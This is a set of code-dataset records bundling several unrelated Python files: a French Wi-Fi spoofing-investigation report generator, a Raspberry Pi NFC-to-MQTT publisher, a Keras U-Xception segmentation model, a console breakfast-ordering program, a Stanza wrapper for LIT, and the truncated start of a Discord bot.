\".format(self.preview.ESSID)\n self.report += \"BSSID du réseau analysé : {0}

\".format(self.preview.BSSID)\n self.report += \"

Après analyse du fichier {0}, effectué par l'investigateur {1}, \".format(self.preview.filename, self.detectiveName)\n self.report += \"le {0}. Dans le but de détecter une attaque de type {1} sur le réseau \".format( self.investigationDate, self.attack)\n self.report += \"de ESSID {0} et dont le BSSID est {1} .\".format(self.preview.ESSID, self.preview.BSSID)\n self.report += \"

L'outil a généré les résultats suivants :\"\n\n        self.report += \"

Nombre de noeuds connectés au réseau : {0}\".format(self.preview.nodesNumber)\n self.report += \"
Nombre total de paquets : {0}

\".format(self.preview.packetsNumber)\n self.report += \"\"\"\n \n \"\"\"\n\n for node in self.nodes:\n\n\n self.report += \"\"\n self.makeGraphs()\n self.report += \"
Adresse MAC du noeud Nombre de paquets Résultat de l'analyse Fiabilité du résultat
\"+str(node[0])+\"\"+str(node[1])+\"\"+str(node[5])+\"\"+str(node[4])+\"
\"\n self.report += \"\"\"\n
\n
\n \n \n \n
\n \n
\n

Carte du réseau '\"\"\"+self.preview.ESSID+\"\"\"'

\n
\n\n\n
\n \n \n \n
\n \n
\n\n
\n\n\n
\n\n \n \n \n
\n \n
\n

Types des paquets

\n
\n\n
\n\n\n \"\"\"\n\n for node in self.nodes:\n if node[2] is not None:\n self.nodeGraphs(node)\n\n path_ = os.path.abspath(\"Parser/Parsed/seq\"+node[0][:-2]+\".png\")\n path1 = os.path.abspath(\"Parser/Parsed/sign\"+node[0][:-2]+\".png\")\n\n self.report += \"\"\"\n
\n \n
\n\n

Cette page contient des informations supplémentaires sur le noeud '\"\"\"+node[0]+\"\"\"'
\n Nombre de paquets de donnée envoyés par ce noeud : \"\"\"+str(node[1])+\"\"\"\n\n
\n \n \n \n
\n \n
\"\"\"\n\n self.report += \"\"\"

Graphe représentant les écarts des numéros de séquence

\n
\"\"\"\n\n\n self.report += \"\"\"
\n \n \n \n
\n \n
\n

Graphe représentant la force du signal

\n
\n\n\n
\n\n\n\n
\n\n\n

\n\n\n \"\"\"\n\n\n\n\n self.report += \"\"\"\n
\n \n
\"\"\"+self.buildTable()+ \"\"\"\n\n\n \"\"\"\n\n\n\n\n self.convertHtmlToPdf(self.report, self.filename)\n\n def convertHtmlToPdf(self, sourceHtml, outputFilename):\n # open output file for writing (truncated binary)\n resultFile = open(outputFilename, \"w+b\")\n\n # convert HTML to PDF\n pisaStatus = pisa.CreatePDF(\n sourceHtml, # the HTML to convert\n dest=resultFile) # file handle to recieve result\n\n # close output file\n resultFile.close() # close output file\n\n # return True on success and False on errors\n return pisaStatus.err\n\n def nodeGraphs(self, node):\n plt.clf()\n Xs = [i for i in range(0,len(node[3]))]\n plt.figure(3)\n plt.title(node[0])\n plt.scatter(Xs, node[2], s=1, facecolor='0.5', lw = 0)\n plt.savefig(\"Parser/Parsed/seq\"+node[0][:-2]+\".png\", dpi=300)\n plt.clf()\n plt.figure(2)\n plt.title(node[0])\n plt.scatter(Xs, node[3], s=1, facecolor='0.5', lw = 0)\n plt.savefig(\"Parser/Parsed/sign\"+node[0][:-2]+\".png\", dpi=300)\n plt.clf()\n\n def makeGraphs(self):\n\n n_groups = 11\n fig, ax = plt.subplots(figsize=(15, 6), dpi=80)\n\n index = np.arange(n_groups)\n bar_width = 0.6\n\n opacity = 0.4\n error_config = {'ecolor': '0.3'}\n\n colors = ['yellowgreen', 'gold', 'lightskyblue', 'cyan', 'black' ,'green', 'blue', 'red', 'yellow', 'magenta', 'white' ]\n\n rects1 = plt.bar(index, self.mgtPackets, bar_width,\n alpha=opacity,\n color=colors,\n error_kw=error_config,\n )\n\n plt.xlabel('Sous-types', fontsize=24)\n plt.ylabel('Nombre de paquets', fontsize=24)\n plt.title('Distribution des paquets de types gestion', fontsize=26)\n plt.xticks(index + bar_width/2, ('0', '1', '2', '3', '4','5', '6', '7', '8', '9','10'))\n max_height = max(self.mgtPackets)\n plt.plot([-0.2,4],[ max_height*1.2, max_height*1.2],clip_on=False,color='white')\n for (x, bar) in zip(self.mgtPackets, rects1):\n ax.text(bar.get_x()+bar_width/2.,x*1.05 , x,\n ha='center', va='bottom', color='black')\n plt.savefig(\"Parser/Parsed/bars.png\")\n\n\n fig, ax = plt.subplots(figsize=(8, 6), dpi=80)\n # The slices will be ordered and plotted counter-clockwise.\n labels = \"Gestion\", \"Controle\", \"Donnees\"\n sizes = self.allPackets\n colors = ['yellowgreen', 'gold', 'lightskyblue']\n explode = (0.1, 0.1, 0.1) # only \"explode\" the 2nd slice (i.e. 'Hogs')\n\n plt.pie(sizes, explode=explode, labels=labels, colors=colors,\n autopct='%1.1f%%', shadow=True, startangle=90)\n # Set aspect ratio to be equal so that pie is drawn as a circle.\n plt.axis('equal')\n\n plt.savefig(\"Parser/Parsed/pie.png\")\n def buildTable(self):\n with open(\"stats.csv\") as f:\n content = f.readlines()\n\n content = content[2:]\n table = \"\"\"\n \n \n \"\"\"\n for i in range(0, len(content), 4):\n\n ctrl = sum([ int(x) for x in content[i+2].split(',')])\n data = sum([ int(x) for x in content[i+3].split(',')])\n mgt = [ x for x in content[i+1].split(',')]\n del mgt[6]\n del mgt[6]\n ctrl = str(ctrl)\n data = str(data)\n table += \"\"\"\n
Noeud 1 Noeud 2 Données controle 0 1 2 3 4 5 6 7 8 9 10
\n \n\n\n\n\n
\"\"\"+content[i].split(',')[1]+\"\"\" \"\"\"+content[i].split(',')[2]+\"\"\" \"\"\"+data+\"\"\" \"\"\"+ctrl+\"\"\" \"\"\"+mgt[0]+\"\"\"\"\"\"+mgt[1]+\"\"\"\"\"\"+mgt[2]+\"\"\"\"\"\"+mgt[3]+\"\"\"\"\"\"+mgt[4]+\"\"\"\"\"\"+mgt[5]+\"\"\"\"\"\"+mgt[6]+\"\"\"\"\"\"+mgt[7]+\"\"\"\"\"\"+mgt[8]+\"\"\"\"\"\"+mgt[9]+\"\"\"\"\"\"+mgt[10]+\"\"\"
\n\n \"\"\"\n return table\n\n\"\"\"\n def networkMap(self):\n g = Graph()\n g.add_verte(name=self.preview.BSSID)\n for node in self.nodes:\n g.add_verte(name=node[0])\n g.add_edge(self.preview.BSSID , node[0])\n\"\"\"\n\n\n# Main program\nif __name__==\"__main__\":\n preview = Preview(\"capture.cap\", \"100 Mo\", \"15.06.15 17h35\", \"15.06.15 17h59\", \"Abderrahmane\", \"01:02:03:04:05:06\", 65004,\n 6, -56, 4, 1800, 65000)\n report = Report(\"Abderrahmane Boulgheraif\", \"10.10.15 15h30\", \"Spoofing\", preview)\n\n","sub_path":"Utilz/DataTypes.py","file_name":"DataTypes.py","file_ext":"py","file_size_in_byte":11440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"182079708","text":"import argparse\nimport asyncio\n\nclass RoomNotificationArgumentParser(argparse.ArgumentParser):\n\n def __init__(self, app, command, client, **kwargs):\n if 'prog' not in kwargs:\n kwargs['prog'] = command\n super().__init__(**kwargs)\n self.client = client\n self.command = command\n self.app = app\n self.task = None\n\n def error(self, message):\n task = asyncio.Task(self.client.room_client.send_notification(html=message))\n raise ArgumentParserError(task)\n\n def print_help(self, file=None):\n message = self.format_help()\n self.task = asyncio.Task(self.client.room_client.send_notification(html=\"
\" + message + \"
\"))\n\n def send_usage(self):\n message = self.format_usage()\n self.task = asyncio.Task(self.client.room_client.send_notification(text=message))\n return self.task\n\n def exit(self, status=0, message=None):\n raise ArgumentParserError(self.task)\n\n @asyncio.coroutine\n def handle_webhook(self, body):\n txt = body['item'][\"message\"][\"message\"][len(self.command):]\n from_mention = body['item']['message']['from']['mention_name']\n items = [x for x in txt.split(\" \") if x]\n # noinspection PyBroadException\n try:\n args = self.parse_args(items)\n except ArgumentParserError as e:\n if e.task:\n yield from e.task\n return\n\n try:\n msg = yield from args.func(args)\n if msg:\n if isinstance(msg, HtmlNotification):\n yield from self.client.room_client.send_notification(from_mention=from_mention,\n html=msg.__str__())\n else:\n yield from self.client.room_client.send_notification(from_mention=from_mention, text=msg)\n except AttributeError:\n if self.task:\n yield from self.task\n elif not args.__dict__:\n yield from self.send_usage()\n else:\n raise\n\n def add_subparsers(self, **parent_kwargs):\n\n parent = self\n\n class MySubParser(RoomNotificationArgumentParser):\n def __init__(self, **kwargs):\n handler = kwargs.pop('handler')\n super().__init__(parent.app, parent.command, parent.client, **kwargs)\n self.set_defaults(func=handler)\n\n return super().add_subparsers(parser_class=MySubParser, **parent_kwargs)\n\n\nclass HtmlNotification(object):\n def __init__(self, text):\n super().__init__()\n self.text = text\n\n def __str__(self):\n return self.text\n\n\nclass ArgumentParserError(Exception):\n\n def __init__(self, task):\n self.task = task","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"505343649","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport json, os, cv2, sys\n\n\ndef vis_detections(im_path, bbx_objs, thresh=0.5):\n \"\"\"Draw detected bounding boxes.\"\"\"\n im = cv2.imread(im_path)\n im = im[:, :, (2, 1, 0)]\n fig, ax = plt.subplots(figsize=(12, 12))\n ax.imshow(im, aspect='equal')\n for bbx_obj in bbx_objs:\n \n score = bbx_obj['score'] \n if score < thresh:\n continue\n bbox = bbx_obj['bbox']\n cls = bbx_obj['class']\n\n ax.add_patch(\n plt.Rectangle((bbox[0], bbox[1]),\n bbox[2] - bbox[0],\n bbox[3] - bbox[1], fill=False,\n edgecolor='red', linewidth=3.5)\n )\n ax.text(bbox[0], bbox[1] - 2,\n '{:s} {:.3f}'.format(cls, score),\n bbox=dict(facecolor='blue', alpha=0.5),\n fontsize=14, color='white')\n\n plt.axis('off')\n plt.tight_layout()\n plt.draw()\n plt.show()\n\ndef load_video_rcnn_bbx(rcnn_bbx_folder, video_name):\n\n file_pref = os.path.join(rcnn_bbx_folder, video_name) \n\n # load rcnn bbx\n with open(file_pref + '_rcnnbbx.json') as json_file:\n rcnn_bbx_data = json.load(json_file)\n\n rcnn_bbx_data = sorted(rcnn_bbx_data['imgblobs'], key=lambda x: int(x['img_path'].split('/')[-1].split('.')[0]))\n\n return rcnn_bbx_data\n\nif __name__ == \"__main__\":\n\n video_name = sys.argv[1]\n start_fid = int(sys.argv[2])\n #rcnn_data = load_video_rcnn_bbx('/mnt/tags/rcnn-bbx-tmp', 'dog_fight_pit_bull_owner_sues_family_for_1m_dollars_after_her_dogs_killed_their_beagle_sYJf_m0qDiw')\n #rcnn_data = load_video_rcnn_bbx('/mnt/tags/rcnn-bbx-tmp', 'dog_fight_pit_bull_owner_sues_family_for_1m_dollars_after_her_dogs_killed_their_beagle_sYJf_m0qDiw')\n rcnn_data = load_video_rcnn_bbx('/mnt/tags/rcnn-bbx-tmp', video_name)\n\n 
for fid, img_obj in enumerate(rcnn_data):\n if fid < start_fid:\n continue\n im_path = img_obj['img_path']\n vis_detections(im_path, img_obj['pred'], 0.4)\n \n \n","sub_path":"fast-rcnn/tools/vis-video.py","file_name":"vis-video.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"249907142","text":"import nxppy\nimport paho.mqtt.client as mqtt\nimport json\nimport time\n\nTOPIC = 'bike/'\nMQTT_BROKER = '10.24.23.140'\nMQTT_PORT = 1883\n\n\"\"\"\nThis component will continuously run in a own process\non the raspberry pi and publish messages when presented\nwith a NFC device\n\"\"\"\n\n# MQTT setup\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\n\ndef on_message(client, userdata, msg):\n print(msg.topic+\" \"+str(msg.payload))\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(MQTT_BROKER, MQTT_PORT)\nclient.loop_start()\n\n\n\"\"\"\nset up nxppy\nnote that installing this is more than installing it\nfollow installation guide: https://github.com/svvitale/nxppy\n\"\"\"\n\nmifare = nxppy.Mifare()\n\nwhile True:\n try:\n uid = mifare.select()\n print(uid)\n\n client.publish(\n TOPIC,\n json.dumps({\n \"command\": \"nfc_det\",\n \"value\": uid,\n \"lock_name\": \"en\",\n }).encode()\n )\n except nxppy.SelectError:\n # We want the reader to fail silently\n # when no nfc device i presented\n pass\n\n time.sleep(1)\n","sub_path":"bike-rack-master/nfc_component.py","file_name":"nfc_component.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"204917711","text":"# coding: utf-8\n\nimport json\n\nclass Address(object):\n zipcode = \"\"\n prefecture = \"\"\n city = \"\"\n\n def __init__(self, zipcode, json):\n self.zipcode = zipcode\n self.prefecture = json['pref'].encode('utf-8')\n self.city = json['address'].encode('utf-8')\n\n def __repr__(self):\n return '
' % \\\n (self.zipcode, self.prefecture, self.city)","sub_path":"geopy/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"502621198","text":"import tensorflow as tf\nfrom keras import backend as K\nfrom keras.utils import Sequence\nfrom keras.layers import LeakyReLU, MaxPooling2D, Dropout, Conv2D, Concatenate, BatchNormalization, Add, ZeroPadding2D\nfrom keras.layers.convolutional import UpSampling2D, Conv2DTranspose\nfrom keras.layers.merge import concatenate\nfrom keras.applications.xception import Xception\nfrom keras.engine.training import Model\nfrom keras.losses import binary_crossentropy\nimport numpy as np\nfrom config import *\nfrom optimizer import ad\n\n\ndef convolution_block(x, filters, size, strides=(1, 1), padding='same', activation=True):\n x = Conv2D(filters, size, strides=strides, padding=padding)(x)\n x = BatchNormalization()(x)\n if activation == True:\n x = LeakyReLU(alpha=0.1)(x)\n return x\n\n\ndef residual_block(blockInput, num_filters=16):\n x = LeakyReLU(alpha=0.1)(blockInput)\n x = BatchNormalization()(x)\n blockInput = BatchNormalization()(blockInput)\n x = convolution_block(x, num_filters, (3, 3))\n x = convolution_block(x, num_filters, (3, 3), activation=False)\n x = Add()([x, blockInput])\n return x\n\n\ndef UXception(input_shape=(None, None, 3)):\n # Use the weight of pre-train model\n backbone = Xception(input_shape=input_shape, weights='imagenet', include_top=False)\n input = backbone.input\n start_neurons = 16\n\n conv4 = backbone.layers[121].output\n conv4 = LeakyReLU(alpha=0.1)(conv4)\n pool4 = MaxPooling2D((2, 2))(conv4)\n pool4 = Dropout(0.1)(pool4)\n\n # Middle\n convm = Conv2D(start_neurons * 32, (3, 3), activation=None, padding=\"same\")(pool4)\n convm = residual_block(convm, start_neurons * 32)\n convm = residual_block(convm, start_neurons * 32)\n convm = LeakyReLU(alpha=0.1)(convm)\n\n deconv4 = Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding=\"same\")(convm)\n uconv4 = concatenate([deconv4, conv4])\n uconv4 = Dropout(0.1)(uconv4)\n\n uconv4 = Conv2D(start_neurons * 16, (3, 3), activation=None, padding=\"same\")(uconv4)\n uconv4 = residual_block(uconv4, start_neurons * 16)\n uconv4 = residual_block(uconv4, start_neurons * 16)\n uconv4 = LeakyReLU(alpha=0.1)(uconv4)\n\n deconv3 = Conv2DTranspose(start_neurons * 8, (3, 3), strides=(2, 2), padding=\"same\")(uconv4)\n conv3 = backbone.layers[31].output\n uconv3 = concatenate([deconv3, conv3])\n uconv3 = Dropout(0.1)(uconv3)\n\n uconv3 = Conv2D(start_neurons * 8, (3, 3), activation=None, padding=\"same\")(uconv3)\n uconv3 = residual_block(uconv3, start_neurons * 8)\n uconv3 = residual_block(uconv3, start_neurons * 8)\n uconv3 = LeakyReLU(alpha=0.1)(uconv3)\n\n deconv2 = Conv2DTranspose(start_neurons * 4, (3, 3), strides=(2, 2), padding=\"same\")(uconv3)\n conv2 = backbone.layers[21].output\n conv2 = ZeroPadding2D(((1, 0), (1, 0)))(conv2)\n uconv2 = concatenate([deconv2, conv2])\n\n uconv2 = Dropout(0.1)(uconv2)\n uconv2 = Conv2D(start_neurons * 4, (3, 3), activation=None, padding=\"same\")(uconv2)\n uconv2 = residual_block(uconv2, start_neurons * 4)\n uconv2 = residual_block(uconv2, start_neurons * 4)\n uconv2 = LeakyReLU(alpha=0.1)(uconv2)\n\n deconv1 = Conv2DTranspose(start_neurons * 2, (3, 3), strides=(2, 2), padding=\"same\")(uconv2)\n conv1 = backbone.layers[11].output\n conv1 = ZeroPadding2D(((3, 0), (3, 0)))(conv1)\n uconv1 = 
concatenate([deconv1, conv1])\n\n uconv1 = Dropout(0.1)(uconv1)\n uconv1 = Conv2D(start_neurons * 2, (3, 3), activation=None, padding=\"same\")(uconv1)\n uconv1 = residual_block(uconv1, start_neurons * 2)\n uconv1 = residual_block(uconv1, start_neurons * 2)\n uconv1 = LeakyReLU(alpha=0.1)(uconv1)\n\n uconv0 = Conv2DTranspose(start_neurons * 1, (3, 3), strides=(2, 2), padding=\"same\")(uconv1)\n uconv0 = Dropout(0.1)(uconv0)\n uconv0 = Conv2D(start_neurons * 1, (3, 3), activation=None, padding=\"same\")(uconv0)\n uconv0 = residual_block(uconv0, start_neurons * 1)\n uconv0 = residual_block(uconv0, start_neurons * 1)\n uconv0 = LeakyReLU(alpha=0.1)(uconv0)\n\n uconv0 = Dropout(0.1 / 2)(uconv0)\n output_layer = Conv2D(1, (1, 1), padding=\"same\", activation=\"sigmoid\")(uconv0)\n\n model = Model(input, output_layer)\n model.name = 'u-xception'\n\n return model\n\n\ndef get_iou_vector(A, B):\n # Numpy version\n batch_size = A.shape[0]\n metric = 0.0\n for batch in range(batch_size):\n t, p = A[batch], B[batch]\n true = np.sum(t)\n pred = np.sum(p)\n\n # deal with empty mask first\n if true == 0:\n metric += (pred == 0)\n continue\n\n # non empty mask case. Union is never empty\n # hence it is safe to divide by its number of pixels\n intersection = np.sum(t * p)\n union = true + pred - intersection\n iou = intersection / union\n\n # iou metrric is a stepwise approximation of the real iou over 0.5\n iou = np.floor(max(0, (iou - 0.45) * 20)) / 10\n\n metric += iou\n\n # teake the average over all images in batch\n metric /= batch_size\n return metric\n\n\ndef my_iou_metric(label, pred):\n # Tensorflow version\n return tf.py_func(get_iou_vector, [label, pred > 0.5], tf.float64)\n\n\n# the F1 score of image segmentation\ndef dice_coef(y_true, y_pred):\n y_true_f = K.flatten(y_true)\n y_pred = K.cast(y_pred, 'float32')\n y_pred_f = K.cast(K.greater(K.flatten(y_pred), 0.5), 'float32')\n intersection = y_true_f * y_pred_f\n score = 2. * K.sum(intersection) / (K.sum(y_true_f) + K.sum(y_pred_f))\n return score\n\n\n# inverse form of dice coef\ndef dice_loss(y_true, y_pred):\n smooth = 1.\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = y_true_f * y_pred_f\n score = (2. * K.sum(intersection) + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n return 1. - score\n\n\ndef bce_dice_loss(y_true, y_pred):\n return binary_crossentropy(y_true, y_pred) + dice_loss(y_true, y_pred)\n\n\ndef bce_logdice_loss(y_true, y_pred):\n return binary_crossentropy(y_true, y_pred) - K.log(1. 
- dice_loss(y_true, y_pred))\n\n\ndef model_gen():\n model = UXception(input_shape=(img_size, img_size, 3))\n model.summary()\n model.compile(loss=bce_dice_loss, optimizer=ad, metrics=[my_iou_metric])\n return model\n\n","sub_path":"model_uxecption.py","file_name":"model_uxecption.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"51509469","text":"import random\nlis=[]#存放所点菜品的列表\nlis1=[]#办卡用存储账户和密码所用列表\nlis_addcai=[]#卖家添加菜单\ndef system():#人性化显示主菜单\n print('*'*30)\n print('欢迎使用街边早餐管理系统 --- 1388888888')\n print('店内优惠活动:现在办理会员卡可享受全店商品5折优惠!',end='\\n\\t')\n print('1.买家服务',end='\\n\\t')#查看销售菜品 选择菜品 查看已点菜单 删除所选菜品 返回上级菜单\n print('2.付款结帐',end='\\n\\t') #现金付款 会员卡付款 返回上级菜单\n print('3.会员服务',end='\\n\\t') #办卡 会员卡充值 返回上级菜单\n print('4.卖家服务',end='\\n\\t') #添加菜品\n print('0.退出系统')\n print('*'*30)\n\n\ndef cai():#卖家添菜函数\n i=1\n maiJia=int(input('输入卖家密码'))#防止买家篡改密码设置固定密码\n n=int(input('输入添加菜的个数'))#循环次数 卖家根据添加菜数设置循环次数,在循环中可以循环输入菜名\n while(i<=n):\n if maiJia==123:\n caiMingI=input('卖家请添加菜名 \\t')\n priceI=int(input('卖家请添加价钱 \\t'))\n dic_addcai={'caiMing':caiMingI,'price':priceI}#将输入的value 菜名以及价格 存到字典\n lis_addcai.append(dic_addcai)#将字典存到列表\n i+=1\n\ndef dianCai():#买家服务函数\n dic={}#定义一个空字典\n print('*'*30)\n print('1.查看销售菜品')\n print('2.选择菜品')\n print('3.查看已点菜单')\n print('4.删除所选菜品')\n print('5.返回上级菜单')\n print('*'*30)\n while(True):\n zjL=int(input('根据提示选择点菜子菜单'))\n if(zjL==1):#如果中间变量=1,显示如下菜单\n print('所点菜名如下 : ')\n for a in lis_addcai: #遍历列表查找相应的菜单\n print('菜名 :%s '% a['caiMing'])#显示菜名\n print('价格 :%d '% a['price'])\n print('已显示所有菜单')\n\n\n\n elif(zjL==2):#如果中间变量=2,显示选择菜品菜单\n while(True):#循环选择\n print('*'*30)\n dianCai=input('菜名')\n for dic_addcai in lis_addcai:\n if dic_addcai['caiMing']==dianCai:\n print('已点菜:%s' % dic_addcai['caiMing'] )\n lis.append(dic_addcai)\n panD=input('是否选好菜 输入 Y/N\\t')#判断是否选好菜,选好即可跳出循环,未选择好继续循环\n if (panD=='Y'):\n break\n print('*'*30)\n elif(zjL==3):\n displayAll()#功能 显示所点菜品\n elif(zjL==4):\n delete()#功能 删除所点菜品\n elif(zjL==5):\n print('返回上级菜单')\n break\n\n\ndef displayAll():#显示菜品函数\n print('*'*30)\n print('所点菜名如下 : ')\n for a in lis: #遍历列表查找相应的菜单\n print('菜名 :%s '% a['caiMing']) #输出菜名\n print('已显示所有菜单')\n print('*'*30)\n\ndef delete():#删除菜品函数\n print('*'*30)\n dCi=input('输入菜名字 \\t')\n print('请删除 %s 菜名' % dCi)\n for dic in lis:#在列表中循环遍历查找dic(所查键值为输入的键值 根据键值查找对应的字典)\n #print(lis)\n if dic['caiMing'] == dCi: #判等的输入菜单名字是否在字典中\n lis.remove(dic)#如果在,则删除此字典\n print('删除 %s 成功' % dCi)\n print('*'*30)\n\n\ndef fuKuanZ():#付款函数 调用 现金付款函数和刷卡付款函数\n print('*'*30)\n print('1.现金付款')\n print('2.刷卡付款')\n print('3.退出菜单')\n zjL=int(input('根据提示选择相应的付款方式'))\n if(zjL==1):\n fuKuan()\n elif(zjL==2):\n shuCard()\n elif(zjL==3):\n system()\n print('*'*30)\n\nmony=0\ndef fuKuan():#定义现金���款函数\n for dic in lis:\n\n print('菜名 : %s 价格 : %d '%(dic['caiMing'],dic['price']))\n mony=int(input('price'))\n if mony>dic['price']: #判断如果输入的钱大于菜的单价即找零\n global mony #引用全局变量\n zl=mony-dic['price'] #计算找零 给的价钱-商品价格\n print('找零 %d 元' %zl)\n else:#(dir['caiMing']=='gbr'):\n print('付款成功')\n\nmoney=0\nmoney1=0\nmoney2=0\ndef shuCard():#定义刷卡函数\n global money\n if money<=0:#判断账户中的钱是否有余额\n money=int(input('充值款'))#输入充值金额\n name=input('输入会员帐号')\n pas=int(input('输入会员密码'))\n for dic1 in lis1:#在存储密码 和 账户的列表中遍历字典\n if (dic1['name']==name) and (dic1['pas']==pas):#如果字典中name键值和pas键值对应的值等于输入的内容\n for dic in lis:#在菜单列表中遍历字典\n if(money0 and len(lis1)!=0:#如果有余额,就直接冲入相应的充值金额\n jeIn=int(input('请冲入金额'))\n money=money+jeIn\n print('卡内余额 %d' %money)\n\n 
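Back to the segmentation metrics defined in model_uxecption.py above: a plain-NumPy spot check of the dice and IoU formulas on a toy pair of binary masks, no TensorFlow session required. The mask values are invented.

import numpy as np

t = np.array([1, 1, 0, 0], dtype=float)  # ground-truth mask
p = np.array([1, 0, 0, 1], dtype=float)  # thresholded prediction
inter = np.sum(t * p)                          # 1.0
dice = 2 * inter / (np.sum(t) + np.sum(p))     # 0.5
iou = inter / (np.sum(t) + np.sum(p) - inter)  # ~0.333
print(dice, iou)  # dice is always >= iou on non-empty masks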
print('*'*30)\n\nwhile(True):#while的主函数\n system()\n print('*'*30)\n coo=int(input('根据提示输入相应功能编号'))\n if(coo==1):#调用买家函数\n dianCai()\n elif(coo==2):#调用付款函数\n fuKuanZ()\n elif(coo==3):#调用会员服务函数\n huiY()\n elif(coo==4):#卖家添加菜服务\n cai()\n elif(coo==0):#退出系统函数\n print('-^ ^-'*7)\n print('已退出系统,欢迎下次光临')\n print('-^ ^-'*7)\n break\n print('*'*30)\n\n\n\n\n\n\n\n","sub_path":"0518/project_0524.py","file_name":"project_0524.py","file_ext":"py","file_size_in_byte":7298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"237749257","text":"# Lint as: python3\n\"\"\"Wrapper for Stanza model\"\"\"\n\nfrom lit_nlp.api import model as lit_model\nfrom lit_nlp.api import types as lit_types\nfrom lit_nlp.api import dtypes\n\nSpanLabel = dtypes.SpanLabel\nEdgeLabel = dtypes.EdgeLabel\n\n\nclass StanzaTagger(lit_model.Model):\n def __init__(self, model, tasks):\n self.model = model\n self.sequence_tasks = tasks[\"sequence\"]\n self.span_tasks = tasks[\"span\"]\n self.edge_tasks = tasks[\"edge\"]\n\n self._input_spec = {\n \"sentence\": lit_types.TextSegment(),\n }\n\n self._output_spec = {\n \"tokens\": lit_types.Tokens(),\n }\n\n # Output spec based on specified tasks\n for task in self.sequence_tasks:\n self._output_spec[task] = lit_types.SequenceTags(align=\"tokens\")\n for task in self.span_tasks:\n self._output_spec[task] = lit_types.SpanLabels(align=\"tokens\")\n for task in self.edge_tasks:\n self._output_spec[task] = lit_types.EdgeLabels(align=\"tokens\")\n\n def _predict(self, ex):\n \"\"\"\n Predicts all specified tasks for an individual example\n\n :param ex (dict):\n This should be a dict with a single entry with:\n key = \"sentence\"\n value (str) = a single string for prediction\n\n :return (list):\n This list contains dicts for each prediction tasks with:\n key = task name\n value (list) = predictions\n \"\"\"\n doc = self.model(ex[\"sentence\"])\n prediction = {}\n for sentence in doc.sentences:\n prediction[\"tokens\"] = [word.text for word in sentence.words]\n\n # Process each sequence task\n for task in self.sequence_tasks:\n prediction[task] = [word.to_dict()[task] for word in sentence.words]\n\n # Process each span task\n for task in self.span_tasks:\n # Mention is currently the only span task\n if task == \"mention\":\n prediction[task] = []\n for entity in sentence.entities:\n # Stanza indexes start/end of entities on char. 
LIT needs them as token indexes\n start, end = entity_char_to_token(entity, sentence)\n span_label = SpanLabel(start=start, end=end, label=entity.type)\n prediction[task].append(span_label)\n\n # Process each edge task\n for task in self.edge_tasks:\n # Deps is currently the only edge task\n if task == \"deps\":\n prediction[task] = []\n for relation in sentence.dependencies:\n label = relation[1]\n span1 = relation[2].id\n span2 = relation[2].id if label == \"root\" else relation[0].id\n edge_label = EdgeLabel(\n (span1 - 1, span1), (span2 - 1, span2), label\n )\n prediction[task].append(edge_label)\n\n return prediction\n\n def predict_minibatch(self, inputs, config=None):\n return [self._predict(ex) for ex in inputs]\n\n def input_spec(self):\n return self._input_spec\n\n def output_spec(self):\n return self._output_spec\n\n\ndef entity_char_to_token(entity, sentence):\n \"\"\"\n Takes Stanza entity and sentence objects and returns the start and end tokens for the entity\n :param entity: Stanza entity\n :param sentence: Stanza sentence\n :return (int, int): Returns the start and end locations indexed by tokens\n \"\"\"\n start_token, end_token = None, None\n for i, v in enumerate(sentence.words):\n x = v.misc.split(\"|\")\n if \"start_char=\" + str(entity.start_char) in x:\n start_token = i\n if \"end_char=\" + str(entity.end_char) in x:\n end_token = i + 1\n return start_token, end_token\n","sub_path":"lit_nlp/examples/models/stanza_models.py","file_name":"stanza_models.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"168688312","text":"import asyncio\nimport traceback\nimport time\n\nimport romkan\nimport discord\nfrom utils.tts import MaryTTS\nfrom discord.ext import commands\n\nfrom . import music_sources as sources\nfrom . 
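entity_char_to_token in the Stanza wrapper above recovers token indexes from character offsets. The same idea on plain data, with invented offsets, as a quick illustration:

text = 'Barack Obama visited Paris'
tokens = [(0, 6), (7, 12), (13, 20), (21, 26)]  # (start_char, end_char) per token

def char_span_to_tokens(start_char, end_char):
    # Exclusive end index, matching the i + 1 convention above.
    start = next(i for i, (s, _) in enumerate(tokens) if s == start_char)
    end = next(i for i, (_, e) in enumerate(tokens) if e == end_char) + 1
    return start, end

print(char_span_to_tokens(0, 12))  # (0, 2), i.e. 'Barack Obama'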
